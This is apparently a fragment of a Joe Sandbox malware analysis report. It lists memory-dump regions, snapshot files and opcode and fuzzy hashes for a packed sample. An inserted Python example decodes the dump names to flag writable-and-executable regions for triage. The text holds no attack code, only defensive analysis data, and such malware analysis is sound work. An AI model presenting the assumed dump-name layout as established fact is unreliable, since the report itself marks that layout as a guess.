• Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
• Opcode ID: 184cd4d49040ef2ec0beb867f12931ab50704c4e6224ce4042edadd2b2c6d73d
• Instruction ID: 615c2bc73594337600b434f4779541f7bae123f47b8a59f007462618c50f6d3d
• Opcode Fuzzy Hash: 184cd4d49040ef2ec0beb867f12931ab50704c4e6224ce4042edadd2b2c6d73d
• Instruction Fuzzy Hash: 87D05E6630D2503AA714955A7D84DBB4A9CCAC56A5F045139FA48C6240E200CC0E93B1
APIs
Memory Dump Source
• Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
• Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
Similarity
• API ID: LocalTime
• String ID:
• API String ID: 481472006-0
• Opcode ID: bc6e9ae72df0d9a46cdbdd3828ad5e3a86ee3cd46294671989785471ecea8baf
• Instruction ID: 8f1ea119c18e458d16307bbfda7fa729aac1afac2fe91b85c394d81c39ef1e98
• Opcode Fuzzy Hash: bc6e9ae72df0d9a46cdbdd3828ad5e3a86ee3cd46294671989785471ecea8baf
• Instruction Fuzzy Hash: E0A011088088020A8A8033280C032AC3080A802A20FC80B80ACB8203E0EA2A0A2882AB
Strings
Memory Dump Source
• Source File: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
• Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
Similarity
• API ID:
• String ID: 2
• API String ID: 0-450215437
• Opcode ID: ae497149ad82b982db1cdd290e240813cdea3fac8c615a46f0ac802d5db3794e
• Instruction ID: 57adfc1afb85d59844f99d46dd3999a1cc97e0371be4145eedf07c4b499ba9d6
• Opcode Fuzzy Hash: ae497149ad82b982db1cdd290e240813cdea3fac8c615a46f0ac802d5db3794e
• Instruction Fuzzy Hash: 40E061474083C29EE74AB27248A645F3D9367916C5F12C41ED06513945C93D4909D277
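The "Memory Dump Source" lists above name every region dumped for the module at 0BE90000 (module 0x0E). The fifth dotted field of each name matches the Windows PAGE_* protection constants (0x02 read-only header, 0x20 execute-read code, 0x04 read-write data, and 0x40/0x80 execute-writable regions that line up with the "PE file has a writeable .text section" and VMProtect signatures in the overview), and the seventh field equals MEM_IMAGE (0x01000000). The decoder below is an added example written for this page, not Joe Sandbox code: the field layout (PID, iteration, dump id, base address, protection, an undecoded flags field, region type, module index) is an assumption inferred from these names and from the snapshot name hcaresult_2_2_be90000, while the PAGE_* and MEM_* values are the authoritative winnt.h constants. It parses the seventeen names copied from this report and lists the image regions that were both writable and executable at dump time, the regions to triage first when looking for unpacked code.

```python
"""Decode Joe Sandbox .sdmp names and flag writable+executable image regions.

Added example for this report page; not part of Joe Sandbox. The name layout is an
ASSUMPTION inferred from the names in the report (see SDMP_RE); the PAGE_*/MEM_*
values are the winnt.h constants.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# winnt.h memory protection constants (authoritative values).
PAGE_NOACCESS, PAGE_READONLY, PAGE_READWRITE, PAGE_WRITECOPY = 0x01, 0x02, 0x04, 0x08
PAGE_EXECUTE, PAGE_EXECUTE_READ = 0x10, 0x20
PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY = 0x40, 0x80
# winnt.h region type constants (authoritative values).
MEM_PRIVATE, MEM_MAPPED, MEM_IMAGE = 0x20000, 0x40000, 0x1000000

PROTECTION_NAMES = {
    PAGE_NOACCESS: "PAGE_NOACCESS", PAGE_READONLY: "PAGE_READONLY",
    PAGE_READWRITE: "PAGE_READWRITE", PAGE_WRITECOPY: "PAGE_WRITECOPY",
    PAGE_EXECUTE: "PAGE_EXECUTE", PAGE_EXECUTE_READ: "PAGE_EXECUTE_READ",
    PAGE_EXECUTE_READWRITE: "PAGE_EXECUTE_READWRITE",
    PAGE_EXECUTE_WRITECOPY: "PAGE_EXECUTE_WRITECOPY",
}
TYPE_NAMES = {MEM_PRIVATE: "MEM_PRIVATE", MEM_MAPPED: "MEM_MAPPED", MEM_IMAGE: "MEM_IMAGE"}
EXECUTABLE_MASK = PAGE_EXECUTE | PAGE_EXECUTE_READ | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY
WRITABLE_MASK = PAGE_READWRITE | PAGE_WRITECOPY | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY

# ASSUMED name layout, inferred from this report (hcaresult_2_2_be90000 = process 2,
# iteration 2, base 0xBE90000): <pid>.<iteration>.<dump id>.<base>.<protection>.<flags>
# .<type>.<module>.sdmp. The 6th field ("flags", always 00000001 here) is not decoded.
SDMP_RE = re.compile(
    r"^(?P<pid>[0-9A-Fa-f]{8})\.(?P<iteration>[0-9A-Fa-f]{8})\.(?P<dump_id>\d+)"
    r"\.(?P<base>[0-9A-Fa-f]{16})\.(?P<protection>[0-9A-Fa-f]{8})\.(?P<flags>[0-9A-Fa-f]{8})"
    r"\.(?P<mem_type>[0-9A-Fa-f]{8})\.(?P<module>[0-9A-Fa-f]{8})\.sdmp$"
)


@dataclass(frozen=True)
class Dump:
    pid: int
    iteration: int
    dump_id: int
    base: int
    protection: int
    flags: int
    mem_type: int
    module: int

    @property
    def executable(self) -> bool:
        return bool(self.protection & EXECUTABLE_MASK)

    @property
    def writable(self) -> bool:
        return bool(self.protection & WRITABLE_MASK)

    @property
    def is_image(self) -> bool:
        return self.mem_type == MEM_IMAGE


def parse_sdmp(name: str) -> Optional[Dump]:
    """Parse one .sdmp file name; None when it does not match the assumed layout."""
    m = SDMP_RE.match(name.strip())
    if not m:
        return None
    return Dump(pid=int(m["pid"], 16), iteration=int(m["iteration"], 16),
                dump_id=int(m["dump_id"], 10), base=int(m["base"], 16),
                protection=int(m["protection"], 16), flags=int(m["flags"], 16),
                mem_type=int(m["mem_type"], 16), module=int(m["module"], 16))


def protection_name(protection: int) -> str:
    """Human-readable PAGE_* name for the low protection byte."""
    return PROTECTION_NAMES.get(protection & 0xFF, f"0x{protection & 0xFF:X}")


def writable_executable_regions(names: Iterable[str]) -> List[Dump]:
    """Image-backed regions that are both writable and executable, sorted by base.
    Normal for a packer that decrypts code in place; abnormal for a cleanly linked PE."""
    dumps = (parse_sdmp(n) for n in names)
    return sorted((d for d in dumps if d and d.is_image and d.writable and d.executable),
                  key=lambda d: d.base)


# The seventeen dump names copied from the "Associated" lists above (module 0x0E).
REPORT_DUMPS = [
    "00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmp",
    "00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp",
    "00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmp",
    "00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmp",
    "00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmp",
    "00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmp",
    "00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmp",
    "00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmp",
    "00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmp",
    "00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmp",
    "00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmp",
    "00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmp",
    "00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmp",
    "00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmp",
    "00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmp",
    "00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmp",
    "00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmp",
]

if __name__ == "__main__":
    for d in filter(None, map(parse_sdmp, REPORT_DUMPS)):
        print(f"{d.base:016X}  {protection_name(d.protection):24}  "
              f"{TYPE_NAMES.get(d.mem_type, hex(d.mem_type))}")
    print(len(writable_executable_regions(REPORT_DUMPS)), "writable+executable image regions")
```

Run against the names above, the decoder reports ten writable-and-executable image regions starting at 0BFB3000; the five with PAGE_EXECUTE_READWRITE (0x40) are the ones most worth carving first, since code that is both written and executed inside a MEM_IMAGE mapping is the classic footprint of a packer stub unpacking in place. Names whose protection field was dumped under a different layout are rejected rather than mis-decoded.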
Memory Dump Source
• Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
• Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: dd2aed043a8aa0fc5089b6edf173471abff15db6ee6023e22ce6e198086db2f1
                                                                                  • Instruction ID: 940a47a741a2200b9de2942383f2f6273a37b247a69dd1a8ba43c229fa8791ff
                                                                                  • Opcode Fuzzy Hash: dd2aed043a8aa0fc5089b6edf173471abff15db6ee6023e22ce6e198086db2f1
                                                                                  • Instruction Fuzzy Hash: 6E32BCB060A3029FD308CF69C49475AB7F1FF94305F118A2DE8A587781DB74E959CB92
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ee640b8b047d6e33a3ea3867b7b941ba9deafbe211bfc8d1f548eff3c5e99f63
                                                                                  • Instruction ID: ca943848195b7c26bf33b14bb7e45c888e80d60608b97516e6a12b7681a6c6ab
                                                                                  • Opcode Fuzzy Hash: ee640b8b047d6e33a3ea3867b7b941ba9deafbe211bfc8d1f548eff3c5e99f63
                                                                                  • Instruction Fuzzy Hash: 951264B7F5121447DF0CCA5ACCA21EDB3A3BFD834871E913E8417E7286ED79690A4684
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a97430d2e2e3a00ab81a81f48107fea70de4dac2e4663874b397620e5b6dd282
                                                                                  • Instruction ID: f08878b6fd96d8eb5a096a85cd1cdbb48492aad6eaad00def74bc4047d1102cd
                                                                                  • Opcode Fuzzy Hash: a97430d2e2e3a00ab81a81f48107fea70de4dac2e4663874b397620e5b6dd282
                                                                                  • Instruction Fuzzy Hash: EFE1C13160D3918FC308CE69C99416AFBE2FFC5308F18896DE8D58B346EA75D94ACB51
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                  • Instruction ID: a17a88e79b3c683315684b310364d1249a9fcd7165521b1d4f5ec9ba3f0f03f0
                                                                                  • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                  • Instruction Fuzzy Hash: 37D170B3C0F9B34A8375813D425812BEEE26FC164531BCBF19CE43F689DA266D1895E0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                  • Instruction ID: 3c76b666607b5bd662f3a1527fd21434c45576fed882d025fd6a2b4c908ee1d8
                                                                                  • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                  • Instruction Fuzzy Hash: C9C171B3C0F9B3468376813D426852AEEE26FC165431BC7F1DCE43F68A9A265D1895E0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                  • Instruction ID: ff2dcf2a76046729d67d8fc750490dab59f9cef864cc9e4f997d6c11cbbde707
                                                                                  • Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                  • Instruction Fuzzy Hash: 2CC190B3D0F9B34A8375813D425812BEEE26FC164031BC7F19DE42F68EDA269D1895E0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
